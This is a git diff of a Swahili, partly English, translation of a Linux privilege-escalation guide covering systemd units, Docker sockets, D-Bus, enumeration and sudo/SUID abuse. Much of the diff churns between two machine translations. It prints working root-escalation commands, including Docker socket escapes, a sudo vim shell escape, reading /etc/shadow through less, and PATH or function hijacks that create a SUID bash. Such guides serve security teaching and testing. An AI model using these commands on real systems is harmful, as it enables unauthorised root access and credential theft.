**Jifunze zaidi kuhusu services kwa `man systemd.service`.** ## **Timers** -**Timers** ni systemd unit files ambazo majina yao yanamalizika kwa `**.timer**` ambazo zinadhibiti `**.service**` files au matukio. **Timers** zinaweza kutumika kama mbadala wa cron kwani zina msaada uliojengwa kwa ajili ya matukio ya kalenda na matukio ya monotonic time, na zinaweza kuendeshwa asynchronously. +**Timers** ni systemd unit files ambazo majina yao yanamalizika na `**.timer**` ambazo zinadhibiti faili au matukio ya `**.service**`. **Timers** zinaweza kutumika kama mbadala wa cron kwani zina msaada uliojengwa kwa ajili ya matukio ya kalenda na matukio ya monotonic na zinaweza kuendeshwa kwa asynchronous. Unaweza kuorodhesha timers zote kwa: ```bash @@ -445,48 +474,48 @@ Unit=backdoor.service ``` Katika nyaraka unaweza kusoma ni nini Unit: -> Unit itakayowashwa wakati timer hii inapomalizika. Hoja ni jina la unit, ambalo uambatisho wake si ".timer". Ikiwa haijatajwa, thamani hii kwa kawaida itakuwa service ambayo ina jina sawa na timer unit, isipokuwa kwa uambatisho. (Angalia hapo juu.) Inapendekezwa kwamba jina la unit litakalowashwa na jina la unit ya timer viwe vimepewa majina sawa, isipokuwa kwa uambatisho. +> Unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. (See above.) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix. -Kwa hivyo, ili kutumia vibaya ruhusa hii utahitaji: +Kwa hiyo, ili kutekeza ruhusa hii utahitaji: -- Pata unit ya systemd (kama a `.service`) ambayo inayo **endesha binary inayoweza kuandikwa** -- Pata unit ya systemd ambayo inayo **endesha a relative path** na una **writable privileges** juu ya **systemd PATH** (ili kuiga executable hiyo) +- Tafuta systemd unit fulani (kama `.service`) ambayo **inayoendesha binary inayoweza kuandikwa** +- Tafuta systemd unit fulani ambayo **inayoendesha relative path** na una **writable privileges** juu ya **systemd PATH** (ili kujifanya executable hiyo) **Jifunze zaidi kuhusu timers kwa kutumia `man systemd.timer`.** -### **Kuwezesha Timer** +### **Kuwawezesha Timer** -Ili kuwezesha timer unahitaji root privileges na kutekeleza: +Ili kuwezesha timer unahitaji ruhusa za root na kuendesha: ```bash sudo systemctl enable backu2.timer Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer. ``` -Kumbuka **timer** ina **wezeshwa** kwa kuunda symlink kwenda kwake kwenye `/etc/systemd/system/.wants/.timer` +Note the **timer** is **activated** by creating a symlink to it on `/etc/systemd/system/.wants/.timer` ## Sockets -Unix Domain Sockets (UDS) zinawezesha **mawasiliano ya mchakato** kwenye mashine moja au tofauti ndani ya mifano ya client-server. Zinatumia faili za descriptor za Unix za kawaida kwa mawasiliano kati ya kompyuta na zinaundwa kupitia faili za `.socket`. +Unix Domain Sockets (UDS) huwezesha **process communication** on the same or different machines within client-server models. Zinatumia standard Unix descriptor files kwa inter-computer communication na zinaanzishwa kupitia `.socket` files. -Sockets zinaweza kusanidiwa kwa kutumia faili za `.socket`. +Sockets can be configured using `.socket` files. -**Jifunze zaidi kuhusu sockets kwa `man systemd.socket`.** Ndani ya faili hili, vigezo kadhaa vya kuvutia vinaweza kusanidiwa: +**Learn more about sockets with `man systemd.socket`.** Inside this file, several interesting parameters can be configured: -- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Chaguzi hizi ni tofauti lakini kwa kifupi zinatumika kuonyesha **mahali ambapo itasikiliza** socket (njia ya faili ya AF_UNIX socket, IPv4/6 na/au namba ya bandari kusikiliza, n.k.) -- `Accept`: Inachukua hoja ya boolean. Ikiwa **true**, **mfano wa service huzalishwa kwa kila muunganisho unaoingia** na socket ya muunganisho pekee ndio hupitishwa kwake. Ikiwa **false**, sockets zote zinazolisikilizwa wenyewe **hutumwa kwa service unit iliyowashwa**, na service unit moja tu huzalishwa kwa muunganisho yote. Thamani hii haizingatiwi kwa datagram sockets na FIFOs ambapo service unit moja bila sharti inashughulikia trafiki yote inayoingia. **Chaguo-msingi ni false**. Kwa sababu za utendaji, inashauriwa kuandika daemons mpya tu kwa njia inayofaa kwa `Accept=no`. -- `ExecStartPre`, `ExecStartPost`: Zinachukua mistari ya amri moja au zaidi, ambazo zinafanywa **kabla** au **baada** socket/FIFO zinazolisikilizwa zina **undwa** na kufungwa (bound), mtawalia. Tokeni ya kwanza ya mstari wa amri lazima iwe jina la faili kamili, kisha ifuatwe na hoja za mchakato. -- `ExecStopPre`, `ExecStopPost`: Amri za ziada ambazo zinafanywa **kabla** au **baada** socket/FIFO zinazolisikilizwa zina **fungwa** na kuondolewa, mtawalia. -- `Service`: Inabainisha jina la unit ya **service** itakayowezeshwa kwenye **trafiki inayoingia**. Mipangilio hii inaruhusiwa tu kwa sockets zenye `Accept=no`. Chaguo-msingi ni service inayoshikilia jina lilelile kama socket (kwa kubadilisha suffix). Katika kesi nyingi, haitakuwa muhimu kutumia chaguo hili. +- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: These options are different but a summary is used to **indicate where it is going to listen** to the socket (the path of the AF_UNIX socket file, the IPv4/6 and/or port number to listen, etc.) +- `Accept`: Inapokea hoja ya boolean. Ikiwa **true**, **service instance is spawned for each incoming connection** na only the connection socket is passed to it. Ikiwa **false**, all listening sockets themselves are **passed to the started service unit**, na only one service unit is spawned for all connections. Thamani hii haizingatiwi kwa datagram sockets na FIFOs ambapo single service unit unconditionally handles all incoming traffic. **Defaults to false**. Kwa sababu za utendaji, inashauriwa kuandika daemons mpya only in a way that is suitable for `Accept=no`. +- `ExecStartPre`, `ExecStartPost`: Inapokea moja au zaidi command lines, ambazo zina **executed before** au **after** the listening **sockets**/FIFOs are **created** na bound, mtawalia. The first token of the command line must be an absolute filename, then followed by arguments for the process. +- `ExecStopPre`, `ExecStopPost`: Additional **commands** ambazo zina **executed before** au **after** the listening **sockets**/FIFOs are **closed** na removed, mtawalia. +- `Service`: Inabainisha jina la **service** unit **to activate** on **incoming traffic**. Hii setting inaruhusiwa tu kwa sockets with Accept=no. Inategemea kwa default service that bears the same name as the socket (with the suffix replaced). Katika most cases, haitapaswi kuwa lazima kutumia chaguo hili. -### Writable `.socket` files +### Writable .socket files -Ikiwa utapata faili ya `.socket` inayoweza kuandikwa unaweza **kuongeza** mwanzoni mwa sehemu ya `[Socket]` kitu kama: `ExecStartPre=/home/kali/sys/backdoor` na backdoor itatekelezwa kabla socket iundwe. Kwa hivyo, **huenda utahitaji kusubiri hadi mashine ianzishwe upya.**\ -_Kumbuka kwamba mfumo lazima utumie usanidi wa faili ya socket hiyo au backdoor haitatekelezwa_ +If you find a **writable** `.socket` file you can **add** at the beginning of the `[Socket]` section something like: `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.**\ +_Note that the system must be using that socket file configuration or the backdoor won't be executed_ ### Writable sockets -Ikiwa **utagundua socket yoyote inayoweza kuandikwa** (_sasa tunazungumzia Unix Sockets na si kuhusu faili za usanidi `.socket`_), basi **unaweza kuwasiliana** na socket hiyo na labda kutumia udhaifu. +If you **identify any writable socket** (_now we are talking about Unix Sockets and not about the config `.socket` files_), then **you can communicate** with that socket and maybe exploit a vulnerability. -### Orodhesha Unix Sockets +### Enumerate Unix Sockets ```bash netstat -a -p --unix ``` @@ -499,7 +528,7 @@ nc -uU /tmp/socket #Connect to UNIX-domain datagram socket #apt-get install socat socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of its type ``` -**Mfano wa Exploitation:** +**Mfano wa exploitation:** {{#ref}} @@ -508,48 +537,48 @@ socket-command-injection.md ### HTTP sockets -Kumbuka kwamba kunaweza kuwa na **sockets listening for HTTP** requests (_Sina maana ya kuzungumzia .socket files bali faili zinazotumika kama unix sockets_). Unaweza kuangalia kwa: +Kumbuka kuwa kunaweza kuwa na baadhi ya **sockets listening for HTTP requests** (_sina kuzungumzia .socket files, bali faili zinazofanya kazi kama unix sockets_). Unaweza kuangalia hili kwa: ```bash curl --max-time 2 --unix-socket /pat/to/socket/files http:/index ``` -Kama socket **inapojibu kwa ombi la HTTP**, basi unaweza **kuwasiliana** nayo na labda **exploit some vulnerability**. +Ikiwa socket **inajibu kwa ombi la HTTP**, basi unaweza **kuwasiliana** nayo na labda **exploit some vulnerability**. -### Socket ya Docker inayoweza kuandikwa +### Docker Socket Inayoweza Kuandikwa -The Docker socket, often found at `/var/run/docker.sock`, is a critical file that should be secured. By default, it's writable by the `root` user and members of the `docker` group. Possessing write access to this socket can lead to privilege escalation. Here's a breakdown of how this can be done and alternative methods if the Docker CLI isn't available. +Socket ya Docker, mara nyingi inapatikana katika `/var/run/docker.sock`, ni faili muhimu ambayo inapaswa kulindwa. Kwa chaguo-msingi, inaweza kuandikwa na mtumiaji `root` na wanachama wa kundi la `docker`. Kuwa na ruhusa ya kuandika kwenye socket hii kunaweza kusababisha privilege escalation. Hapa kuna muhtasari wa jinsi hii inaweza kufanywa na mbinu mbadala ikiwa Docker CLI haitapatikana. #### **Privilege Escalation with Docker CLI** -If you have write access to the Docker socket, you can escalate privileges using the following commands: +Ikiwa una ruhusa ya kuandika kwenye Docker socket, unaweza escalate privileges kwa kutumia amri zifuatazo: ```bash docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh ``` -Amri hizi zinakuwezesha kuendesha container ikiwa na root-level access kwenye filesystem ya host. +Hizi amri zinakuwezesha kuendesha container kwa ufikiaji wa root kwenye filesystem ya host. -#### **Kutumia Docker API Moja kwa Moja** +#### **Kutumia Docker API moja kwa moja** -Ikiwa Docker CLI haipatikani, Docker socket bado inaweza kutumiwa kwa kutumia Docker API na amri za `curl`. +Katika kesi ambapo Docker CLI haipatikani, docker socket bado inaweza kudhibitiwa kwa kutumia Docker API na amri za `curl`. -1. **List Docker Images:** Pata orodha ya images zinazopatikana. +1. **List Docker Images:** Retrieve the list of available images. ```bash curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json ``` -2. **Create a Container:** Tuma ombi la kuunda container linalofunga directory ya root ya host. +2. **Create a Container:** Send a request to create a container that mounts the host system's root directory. ```bash curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create ``` -Anzisha container mpya iliyoundwa: +Start the newly created container: ```bash curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers//start ``` -3. **Attach to the Container:** Unganisha kwenye container: Tumia `socat` kuanzisha muunganisho kwa container, kuruhusu utekelezaji wa amri ndani yake. +3. **Attach to the Container:** Use `socat` to establish a connection to the container, enabling command execution within it. ```bash socat - UNIX-CONNECT:/var/run/docker.sock @@ -559,13 +588,13 @@ Connection: Upgrade Upgrade: tcp ``` -Baada ya kuanzisha muunganisho wa `socat`, unaweza kutekeleza amri moja kwa moja ndani ya container ukiwa na root-level access kwenye filesystem ya host. +After setting up the `socat` connection, you can execute commands directly in the container with root-level access to the host's filesystem. -### Wengine +### Others -Kumbuka kwamba ikiwa una ruhusa za kuandika kwenye docker socket kwa sababu uko **ndani ya group `docker`** una [**njia zaidi za kuinua privileges**](interesting-groups-linux-pe/index.html#docker-group). Ikiwa [**docker API inasikiliza kwenye port** unaweza pia kuwa na uwezo wa kuikompromisa](../../network-services-pentesting/2375-pentesting-docker.md#compromising). +Kumbuka kwamba ikiwa una ruhusa za kuandika kwenye docker socket kwa sababu uko **ndani ya group `docker`** una [**njia zaidi za kuongeza hadhi**](interesting-groups-linux-pe/index.html#docker-group). Ikiwa [**docker API inasikiliza kwenye port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising). -Tazama **njia zaidi za kutoroka kutoka docker au kuitumia vibaya kuinua privileges** katika: +Angalia **njia zaidi za kutoroka kutoka docker au kuitumia vibaya ili kuongeza hadhi** katika: {{#ref}} @@ -574,7 +603,7 @@ docker-security/ ## Containerd (ctr) privilege escalation -Ikiwa ugundua kwamba unaweza kutumia amri ya **`ctr`**, soma ukurasa ufuatao kwani **unaweza kuitumia vibaya kuinua privileges**: +Ikiwa unagundua kwamba unaweza kutumia amri ya **`ctr`**, soma ukurasa ufuatao kwa sababu **huenda ukaweza kuitumia vibaya ili kuongeza hadhi**: {{#ref}} @@ -583,7 +612,7 @@ containerd-ctr-privilege-escalation.md ## **RunC** privilege escalation -Ikiwa ugundua kwamba unaweza kutumia amri ya **`runc`** soma ukurasa ufuatao kwani **unaweza kuitumia vibaya kuinua privileges**: +Ikiwa unagundua kwamba unaweza kutumia amri ya **`runc`**, soma ukurasa ufuatao kwa sababu **huenda ukaweza kuitumia vibaya ili kuongeza hadhi**: {{#ref}} @@ -592,15 +621,15 @@ runc-privilege-escalation.md ## **D-Bus** -D-Bus ni mfumo tata wa **inter-Process Communication (IPC)** ambao unawawezesha applications kuwasiliana na kushirikiana data kwa ufanisi. Imetengenezwa kwa ajili ya mfumo wa kisasa wa Linux, na hutoa mfumo imara wa aina mbalimbali za mawasiliano ya application. +D-Bus ni mfumo wa hali ya juu wa **mawasiliano kati ya michakato (IPC)** unaowezesha programu kuwasiliana kwa ufanisi na kushiriki data. Umeundwa kwa kuzingatia mfumo wa kisasa wa Linux, hutoa mfumo thabiti kwa njia mbalimbali za mawasiliano ya programu. -Mfumo huo ni wa kimnada, ukisaidia IPC ya msingi ambayo inaboresha kubadilishana data kati ya processes, ikikumbusha kwa kiasi **enhanced UNIX domain sockets**. Zaidi ya hayo, husaidia katika kutangaza matukio au signals, kuimarisha muunganisho kati ya vipengele vya mfumo. Kwa mfano, signal kutoka kwa daemon ya Bluetooth kuhusu simu inayokuja inaweza kusababisha music player kunyamaza, ikiboresha uzoefu wa mtumiaji. Aidha, D-Bus ina mfumo wa remote object, kurahisisha maombi ya service na invocation za method kati ya applications, kurahisisha michakato ambayo hapo awali ilikuwa ngumu. +Mfumo ni wenye mabadilika, unaounga mkono IPC za msingi zinazoimarisha kubadilishana data kati ya michakato, similari na **sockets za eneo la UNIX zilizoimarishwa**. Zaidi ya hayo, husaidia katika kutangaza matukio au ishara, kukuza ushirikiano wa sehemu za mfumo. Kwa mfano, ishara kutoka kwa daemon ya Bluetooth kuhusu simu inayokuja inaweza kusababisha player wa muziki kutulia, kuboresha uzoefu wa mtumiaji. Aidha, D-Bus inaunga mkono mfumo wa vitu vya mbali (remote object system), kurahisisha maombi ya huduma na kuitishwa kwa method kati ya programu, kurahisisha michakato ambayo kwa kawaida ilikuwa ngumu. -D-Bus inafanya kazi kwa mfano wa **allow/deny model**, ikisimamia ruhusa za ujumbe (kama method calls, signal emissions, n.k.) kulingana na athari ya jumla ya kufanana kwa sheria za sera. Sera hizi zinaelezea mwingiliano na bus, na zinaweza kuruhusu kuinuka kwa privileges kupitia udanganyifu wa ruhusa hizi. +D-Bus hufanya kazi kwa mfano wa **kuruhusu/kukanusha**, ikisimamia ruhusa za ujumbe (mitelezo ya method, kutuma ishara, n.k.) kulingana na athari ya jumla ya sheria za sera zinazolingana. Sera hizi zinaelekeza mwingiliano na bus, na zinaweza kuruhusu kuongeza hadhi kwa kumtumia vibaya mtu zile ruhusa. -Mfano wa sera kama hiyo katika `/etc/dbus-1/system.d/wpa_supplicant.conf` umeonyeshwa, ukielezea ruhusa kwa root user kumiliki, kutuma, na kupokea ujumbe kutoka `fi.w1.wpa_supplicant1`. +Mfano wa sera kama hizi ulio katika `/etc/dbus-1/system.d/wpa_supplicant.conf` umeonyeshwa, ukielezea ruhusa za mtumiaji root kumiliki, kutuma, na kupokea ujumbe kutoka `fi.w1.wpa_supplicant1`. -Sera zisizo na mtumiaji au group maalum zinatumika kwa wote, wakati sera za muktadha "default" zinatumika kwa wale wote ambao hawajafunikwa na sera maalum nyingine. +Sera zisizo na mtumiaji au group maalum zinafanya kazi kwa wote, wakati sera za muktadha "default" zinatumika kwa wale wasiofunikwa na sera maalum nyingine. ```xml @@ -618,7 +647,7 @@ d-bus-enumeration-and-command-injection-privilege-escalation.md ## **Mtandao** -Inavutia kila wakati enumerate mtandao na kubaini nafasi ya mashine. +Inavutia kila wakati enumerate the network na kubaini nafasi ya mashine. ### Generic enumeration ```bash @@ -643,24 +672,24 @@ cat /etc/networks #Files used by network services lsof -i ``` -### Bandari wazi +### Open ports -Kila mara angalia huduma za mtandao zinazoendesha kwenye mashine ambazo haukuweza kuingiliana nazo kabla ya kuifikia: +Daima angalia network services zinazoendesha kwenye machine ambazo haukuweza kuingiliana nazo kabla ya kupata ufikiaji wake: ```bash (netstat -punta || ss --ntpu) (netstat -punta || ss --ntpu) | grep "127.0" ``` ### Sniffing -Angalia kama unaweza sniff traffic. Ikiwa unaweza, unaweza kupata credentials. +Angalia kama unaweza sniff traffic. Ikiwa unaweza, huenda ukaweza kupata baadhi ya credentials. ``` timeout 1 tcpdump ``` ## Watumiaji -### Generic Enumeration +### Uorodheshaji wa Kawaida -Angalia ni **nani** wewe, ni **privileges** gani ulizo, ni **watumiaji** gani wako kwenye mfumo, ni nani wanaweza **kuingia** na ni nani wana **root privileges**: +Angalia **nani** wewe ni, **ruhusa** gani ulizonazo, **watumiaji** walio kwenye mfumo, ni gani wanaoweza **kuingia** na ni gani wana **ruhusa za root**: ```bash #Info about me id || (whoami && groups) 2>/dev/null @@ -684,12 +713,12 @@ gpg --list-keys 2>/dev/null ``` ### UID Kubwa -Baadhi ya matoleo ya Linux yaliathiriwa na hitilafu inayowawezesha watumiaji wenye **UID > INT_MAX** kuinua ruhusa. More info: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\ +Baadhi ya matoleo ya Linux yaliathiriwa na hitilafu inayowawezesha watumiaji wenye **UID > INT_MAX** kupandisha vibali. Maelezo zaidi: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\ **Exploit it** using: **`systemd-run -t /bin/bash`** ### Vikundi -Angalia kama wewe ni **mwanachama wa kikundi fulani** ambacho kinaweza kukupa ruhusa za root: +Angalia ikiwa wewe ni **mwanachama wa kundi fulani** ambalo linaweza kukupa vibali vya root: {{#ref}} @@ -698,7 +727,7 @@ interesting-groups-linux-pe/ ### Ubao wa kunakili -Angalia kama kuna kitu chochote cha kuvutia ndani ya ubao wa kunakili (ikiwa inawezekana) +Angalia ikiwa kuna kitu chochote cha kuvutia kiko ndani ya clipboard (ikiwa inawezekana) ```bash if [ `which xclip 2>/dev/null` ]; then echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` @@ -709,24 +738,24 @@ echo "Highlighted text: "`xsel -o 2>/dev/null` else echo "Not found xsel and xclip" fi ``` -### Sera ya Nywila +### Sera ya Nenosiri ```bash grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs ``` -### Nenosiri zinazojulikana +### Nywila zinazojulikana -Ikiwa unajua **nenosiri yoyote** ya mazingira, **jaribu kuingia kwa kila mtumiaji** ukitumia nenosiri hilo. +Ikiwa **unajua nywila yoyote** ya mazingira **jaribu kuingia kama kila mtumiaji** ukitumia nywila hiyo. ### Su Brute -Ikiwa hautajali kusababisha kelele nyingi na binaries za `su` na `timeout` ziko kwenye kompyuta, unaweza kujaribu brute-force mtumiaji kutumia [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\ -[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) kwa kutumia parameter `-a` pia inajaribu brute-force watumiaji. +Ikiwa hukatai kusababisha kelele nyingi na binaries za `su` na `timeout` ziko kwenye kompyuta, unaweza kujaribu brute-force mtumiaji kwa kutumia [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\ +[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) ukiwa na parameter ya `-a` pia inajaribu brute-force watumiaji. ## Matumizi mabaya ya PATH inayoweza kuandikwa ### $PATH -Ikiwa utagundua kwamba unaweza **kuandika ndani ya folda fulani ya $PATH**, huenda ukaweza kupandisha vibali kwa **kuunda backdoor ndani ya folda inayoandikwa** kwa jina la amri itakayotekelezwa na mtumiaji mwingine (root ni bora) na ambayo **haitapakiwa kutoka kwenye folda iliyoko kabla** ya folda yako inayoweza kuandikwa katika $PATH. +Ikiwa ugundua kwamba unaweza **kuandika ndani ya folda fulani ya $PATH** unaweza kuwa na uwezo wa kuinua ruhusa kwa **kuunda backdoor ndani ya folda inayoweza kuandikwa** kwa jina la amri fulani ambayo itatekelezwa na mtumiaji mwingine (root ikiwa inawezekana) na ambayo **haitapakiwa kutoka kwenye folda iliyoko kabla** ya folda yako inayoweza kuandikwa kwenye $PATH. ### SUDO and SUID @@ -746,36 +775,36 @@ less>! ``` ### NOPASSWD -Kusanidi sudo kunaweza kumruhusu mtumiaji kutekeleza amri fulani kwa ruhusa za mtumiaji mwingine bila kujua nenosiri. +Usanidi wa sudo unaweza kumruhusu mtumiaji kutekeleza amri fulani kwa kutumia ruhusa za mtumiaji mwingine bila kujua nenosiri. ``` $ sudo -l User demo may run the following commands on crashlab: (root) NOPASSWD: /usr/bin/vim ``` -Katika mfano huu mtumiaji `demo` anaweza kuendesha `vim` kama `root`, sasa ni rahisi kupata shell kwa kuongeza ssh key ndani ya saraka ya root au kwa kuita `sh`. +Katika mfano huu mtumiaji `demo` anaweza kuendesha `vim` kama `root`, sasa ni rahisi kupata shell kwa kuongeza ssh key kwenye root directory au kwa kuitisha `sh`. ``` sudo vim -c '!sh' ``` ### SETENV -Kiagizo hiki kinamruhusu mtumiaji **set an environment variable** wakati anatekeleza kitu: +Agizo hili linamruhusu mtumiaji **set an environment variable** wakati anatekeleza kitu: ```bash $ sudo -l User waldo may run the following commands on admirer: (ALL) SETENV: /opt/scripts/admin_tasks.sh ``` -Mfano huu, **iliyotokana na HTB machine Admirer**, ulikuwa **dhaifu** kwa **PYTHONPATH hijacking** ili kupakia maktaba yoyote ya python wakati wa kuendesha script kama root: +Mfano huu, **uliotokana na HTB machine Admirer**, ulikuwa **nyeti** kwa **PYTHONPATH hijacking** ili kupakia maktaba yoyote ya python wakati script ikitekelezwa kama root: ```bash sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh ``` -### BASH_ENV imehifadhiwa kupitia sudo env_keep → root shell +### BASH_ENV imehifadhiwa kupitia sudo env_keep → shell ya root -Ikiwa sudoers inahifadhi `BASH_ENV` (mfano, `Defaults env_keep+="ENV BASH_ENV"`), unaweza kutumia tabia ya kuanzisha isiyo ya mwingiliano ya Bash ili kuendesha msimbo wowote kama root unapoiita amri inayoruhusiwa. +Ikiwa sudoers inahifadhi `BASH_ENV` (kwa mfano, `Defaults env_keep+="ENV BASH_ENV"`), unaweza kutumia tabia ya kuanzishwa kwa Bash isiyo ya kuingiliana ili kuendesha msimbo wowote kama root unapoita amri iliyoruhusiwa. -- Why it works: Kwa shells zisizo za mwingiliano, Bash inatathmini `$BASH_ENV` na inasoma faili hilo kabla ya kuendesha script lengwa. Kanuni nyingi za sudo zinaruhusu kuendesha script au shell wrapper. Ikiwa `BASH_ENV` imehifadhiwa na sudo, faili yako itasomwa kwa ruhusa za root. +- Kwa nini inafanya kazi: Kwa shells zisizo za kuingiliana, Bash hupima `$BASH_ENV` na kusoma (source) faili hiyo kabla ya kuendesha script lengwa. Kanuni nyingi za sudo zina ruhusa ya kuendesha script au wrapper ya shell. Ikiwa `BASH_ENV` imehifadhiwa na sudo, faili yako inasomwa kwa haki za root. - Mahitaji: -- Kanuni ya sudo utakayoweza kuendesha (lengo lolote linaloitisha `/bin/bash` isiyo ya mwingiliano, au script yoyote ya bash). +- Kanuni ya sudo unayoweza kuitekeleza (lengo lolote linaloiita `/bin/bash` isiyo ya kuingiliana, au script yoyote ya bash). - `BASH_ENV` kuwepo katika `env_keep` (angalia kwa `sudo -l`). - PoC: @@ -788,14 +817,14 @@ chmod +x /dev/shm/shell.sh BASH_ENV=/dev/shm/shell.sh sudo /usr/bin/systeminfo # or any permitted script/binary that triggers bash # You should now have a root shell ``` -- Hardening: -- Ondoa `BASH_ENV` (na `ENV`) kutoka `env_keep`, tumia `env_reset` badala yake. +- Kuimarisha: +- Ondoa `BASH_ENV` (na `ENV`) kutoka `env_keep`, tumia `env_reset`. - Epuka shell wrappers kwa amri zinazoruhusiwa na sudo; tumia binaries ndogo. -- Fikiria kurekodi I/O ya sudo na kutuma onyo wakati env vars zilizohifadhiwa zinapotumika. +- Zingatia sudo I/O logging na alerting wakati preserved env vars zinapotumika. ### Sudo execution bypassing paths -**Ruka** kusoma mafaili mengine au tumia **symlinks**. Kwa mfano katika faili ya sudoers: _hacker10 ALL= (root) /bin/less /var/log/\*_ +**Jump** kusoma faili nyingine au kutumia **symlinks**. Kwa mfano katika faili ya sudoers: _hacker10 ALL= (root) /bin/less /var/log/\*_ ```bash sudo less /var/logs/anything less>:e /etc/shadow #Jump to read other files using privileged less @@ -805,46 +834,46 @@ less>:e /etc/shadow #Jump to read other files using privileged less ln /etc/shadow /var/log/new sudo less /var/log/new #Use symlinks to read any file ``` -Ikiwa **wildcard** inapotumika (\*), ni rahisi hata zaidi: +Ikiwa **wildcard** inatumika (\*), ni rahisi zaidi: ```bash sudo less /var/log/../../etc/shadow #Read shadow sudo less /var/log/something /etc/shadow #Red 2 files ``` -**Countermeasures**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/) +**Hatua za kukabiliana**: [https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/](https://blog.compass-security.com/2012/10/dangerous-sudoers-entries-part-5-recapitulation/) -### Sudo command/SUID binary without command path +### Sudo command/SUID binary bila njia ya amri -Ikiwa **sudo permission** imetolewa kwa amri moja **without specifying the path**: _hacker10 ALL= (root) less_ unaweza ku-exploit kwa kubadilisha PATH variable +Ikiwa **sudo permission** imetolewa kwa amri moja tu **bila kubainisha njia**: _hacker10 ALL= (root) less_ unaweza kuiexploit kwa kubadilisha PATH variable ```bash export PATH=/tmp:$PATH #Put your backdoor in /tmp and name it "less" sudo less ``` -Mbinu hii pia inaweza kutumika ikiwa binary ya **suid** inatekeleza amri nyingine bila kubainisha njia yake (daima angalia kwa** _**strings**_ **maudhui ya binary ya SUID isiyo ya kawaida)**. +Mbinu hii pia inaweza kutumika ikiwa **suid** binary **inaendesha amri nyingine bila kutaja njia yake (daima angalia kwa** _**strings**_ **yaliyomo kwenye binary ya SUID isiyo ya kawaida)**. [Payload examples to execute.](payloads-to-execute.md) ### SUID binary yenye njia ya amri -Ikiwa binary ya **suid** **inatekeleza amri nyingine huku ikibainisha njia**, basi, unaweza kujaribu **ku-export function** iliyoitwa kama amri ambayo faili ya suid inaiita. +Ikiwa **suid** binary **inaendesha amri nyingine kwa kutaja njia**, basi unaweza kujaribu **export a function** iliyopewa jina la amri ambayo faili ya suid inaiita. -Kwa mfano, ikiwa binary ya suid inaita _**/usr/sbin/service apache2 start**_ lazima ujaribu kuunda function na kui-export: +Kwa mfano, ikiwa suid binary inaita _**/usr/sbin/service apache2 start**_ unapaswa kujaribu kuunda function na kui-export: ```bash function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } export -f /usr/sbin/service ``` -Kisha, unapomuita suid binary, function hii itaendeshwa +Kisha, unapomuita suid binary, kazi hii itatekelezwa ### LD_PRELOAD & **LD_LIBRARY_PATH** -Kigezo cha mazingira **LD_PRELOAD** kinatumika kutaja moja au zaidi ya shared libraries (.so files) zinapakiwa na loader kabla ya nyingine zote, ikiwemo maktaba ya kawaida ya C (`libc.so`). Mchakato huu unajulikana kama preloading a library. +Variable ya mazingira **LD_PRELOAD** hutumiwa kubainisha moja au zaidi ya shared libraries (.so files) ambazo loader itazipakia kabla ya nyingine zote, ikiwa ni pamoja na standard C library (`libc.so`). Mchakato huu unajulikana kama preloading ya library. -Hata hivyo, ili kudumisha usalama wa mfumo na kuzuia kipengele hiki kutumika vibaya, hasa kwa **suid/sgid** executables, mfumo unatekeleza masharti fulani: +Hata hivyo, ili kudumisha usalama wa mfumo na kuzuia kipengele hiki kutumiwa vibaya, hasa kwa executables za **suid/sgid**, mfumo unaweka masharti kadhaa: -- Loader haitazingatia **LD_PRELOAD** kwa executables ambapo real user ID (_ruid_) haifananishi na effective user ID (_euid_). -- Kwa executables zenye suid/sgid, maktaba tu zilizoko katika njia za kawaida ambazo pia ni suid/sgid ndizo zinazopreloaded. +- Loader hupuuzia **LD_PRELOAD** kwa executables ambapo real user ID (_ruid_) haifani na effective user ID (_euid_). +- Kwa executables zenye suid/sgid, maktaba zitakazopakiwa awali ni zile tu zilizopo katika standard paths ambazo pia ni suid/sgid. -Privilege escalation inaweza kutokea ikiwa una uwezo wa kuendesha amri kwa kutumia `sudo` na matokeo ya `sudo -l` yanajumuisha taarifa **env_keep+=LD_PRELOAD**. Mpangilio huu unaruhusu kigezo cha mazingira **LD_PRELOAD** kubaki na kutambuliwa hata wakati 